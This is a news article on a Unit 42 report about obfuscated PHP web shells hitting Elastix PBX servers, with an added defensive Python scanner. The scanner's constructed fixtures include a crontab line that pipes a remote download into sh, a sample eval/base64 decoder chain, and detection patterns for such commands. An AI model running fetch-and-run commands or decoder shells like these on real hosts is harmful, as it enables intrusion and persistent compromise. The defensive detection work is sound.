Security researchers have identified more than 500,000 unique malware samples targeting the Elastix communications software that runs on phones from VoIP vendor Digium. Not even the desk phone is safe.
According to Unit 42, the threat intelligence team at cybersecurity company Palo Alto Networks, the attackers targeted Digium phones by implanting a web shell (a malicious script that lets an attacker remotely run commands on a web server) in order to exfiltrate data. The campaign ran for roughly three months, from late December 2021 to the end of March 2022.
Desk phones are an unexpected foothold for threat actors, but as cybersecurity news outlet Cybernews points out, modern IP handsets are networked devices: they display contact information, store voicemails and call logs, and more. Call centers and any company running this kind of communications software on its handsets are at risk.
The attackers went after Elastix, the unified communications server software used on Digium phones, which the report describes as the largest open source solution of its kind. It brings together email, instant messaging, faxing, collaboration functionality and an Internet Protocol (IP) Private Branch Exchange (PBX). As the report points out, it has a web interface and includes call center capabilities such as predictive dialing.
“The malware installs multilayer obfuscated PHP backdoors to the web server’s file system, downloads new payloads for execution and schedules recurring tasks to re-infect the host system,” the report states. “Moreover, the malware implants a random junk string to each malware download in an attempt to evade signature defenses based on indicators of compromise (IoCs).”
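The behaviour in that quote (layered PHP obfuscation, scheduled re-infection, and a junk string appended to each download so that file-hash indicators stop matching) points to what a defender should look for. The Python below is an added example written for this page; it is not Unit 42's tooling or anything from the report, and every path, sample file, pattern list and crontab in it is constructed. It scores PHP files by the obfuscation constructs they contain rather than by hash, shows that a normalized hash survives the junk string where a plain hash does not, and flags crontab entries that would re-fetch or re-run a payload.

```python
"""Added example (not Unit 42's code or anything from the report): flag
obfuscated PHP backdoors by structure instead of by file hash, and spot cron
entries that would re-infect the host. All sample files, paths and patterns
are constructed for illustration."""
import hashlib
import re

# Constructs common to multilayer-obfuscated PHP backdoors. Heuristic list,
# not an authoritative signature: packed or minified legitimate PHP can match too.
OBFUSCATION_PATTERNS = [
    r"\beval\s*\(",
    r"\bbase64_decode\s*\(",
    r"\bgzinflate\s*\(|\bgzuncompress\s*\(",
    r"\bstr_rot13\s*\(",
    r"\bcreate_function\s*\(",
    r"\bassert\s*\(\s*\$",               # assert() used as eval()
    r"\$_(GET|POST|REQUEST|COOKIE)\[",   # attacker input reaching the decoder
    r"[A-Za-z0-9+/]{200,}={0,2}",        # long base64 blob carrying the next layer
]

# Cron entries that pull and execute a remote payload, or run PHP out of the web root.
CRON_PATTERNS = [
    r"\b(curl|wget)\b.*\|\s*(sh|bash)\b",
    r"\bphp\s+\S*/var/www/",
]


def obfuscation_score(php_source: str) -> int:
    """Number of distinct obfuscation constructs present in one PHP file."""
    return sum(1 for pattern in OBFUSCATION_PATTERNS if re.search(pattern, php_source))


def raw_hash(php_source: str) -> str:
    """Plain SHA-256 of the file: what a hash-based IoC would match on."""
    return hashlib.sha256(php_source.encode()).hexdigest()


def normalized_hash(php_source: str) -> str:
    """SHA-256 after dropping block comments and whitespace, so junk appended
    inside a comment no longer changes the hash. Assumes the junk lives in a
    /* */ comment, as in the constructed samples; real samples may differ."""
    stripped = re.sub(r"/\*.*?\*/", "", php_source, flags=re.S)
    stripped = re.sub(r"\s+", "", stripped)
    return hashlib.sha256(stripped.encode()).hexdigest()


def scan_webroot(files: dict, threshold: int = 3) -> list:
    """Return (path, score, normalized_hash) for every file at or above threshold."""
    findings = []
    for path, source in files.items():
        score = obfuscation_score(source)
        if score >= threshold:
            findings.append((path, score, normalized_hash(source)))
    return findings


def suspicious_cron_lines(crontab: str) -> list:
    """Crontab lines that look like a re-infection hook."""
    return [line for line in crontab.splitlines()
            if any(re.search(pattern, line) for pattern in CRON_PATTERNS)]


# Constructed samples: the same three-layer decoder with a different junk comment appended.
_BLOB = "A" * 240  # stand-in for a base64 payload; real payloads are not this uniform
SAMPLE_A = ('<?php\n$x = base64_decode("' + _BLOB + '");\n'
            'eval(gzinflate(str_rot13($x)));\n/* junk: q8ZkL2vT */\n')
SAMPLE_B = SAMPLE_A.replace("q8ZkL2vT", "3mPx9aRd")
BENIGN = ('<?php\nrequire_once "config.php";\n'
          '$rows = $db->query("SELECT id FROM calls");\n'
          'foreach ($rows as $r) echo $r["id"];\n')
SAMPLE_FILES = {
    "/var/www/html/admin/report.php": BENIGN,
    "/var/www/html/.h/index.php": SAMPLE_A,
    "/var/www/html/images/cache.php": SAMPLE_B,
}
SAMPLE_CRONTAB = """\
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://198.51.100.7/x.txt | sh
*/10 * * * * php /var/www/html/.h/index.php
"""

if __name__ == "__main__":
    print("raw hashes equal:       ", raw_hash(SAMPLE_A) == raw_hash(SAMPLE_B))
    print("normalized hashes equal:", normalized_hash(SAMPLE_A) == normalized_hash(SAMPLE_B))
    for finding in scan_webroot(SAMPLE_FILES):
        print("obfuscated PHP:", finding)
    for line in suspicious_cron_lines(SAMPLE_CRONTAB):
        print("cron hook:", line)
```

Run as a script, it reports that the two constructed backdoors have different raw hashes but the same normalized hash, flags both of them and not the benign file, and lists the two cron lines. The structural score is the more robust of the two checks: comment stripping only helps when the junk sits in a comment, whereas the decoder chain has to stay intact for the backdoor to work at all. Treat hits as leads to verify, not verdicts.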
While Unit 42 doesn’t say which businesses or users were affected, the campaign is a reminder that malware can reach a wide range of devices, not only through malicious Android apps or spyware on iPhones. To keep your phones and laptops safe, check out the best antivirus apps. And for a closer look at the different kinds of malicious software, find out the differences between spyware and stalkerware.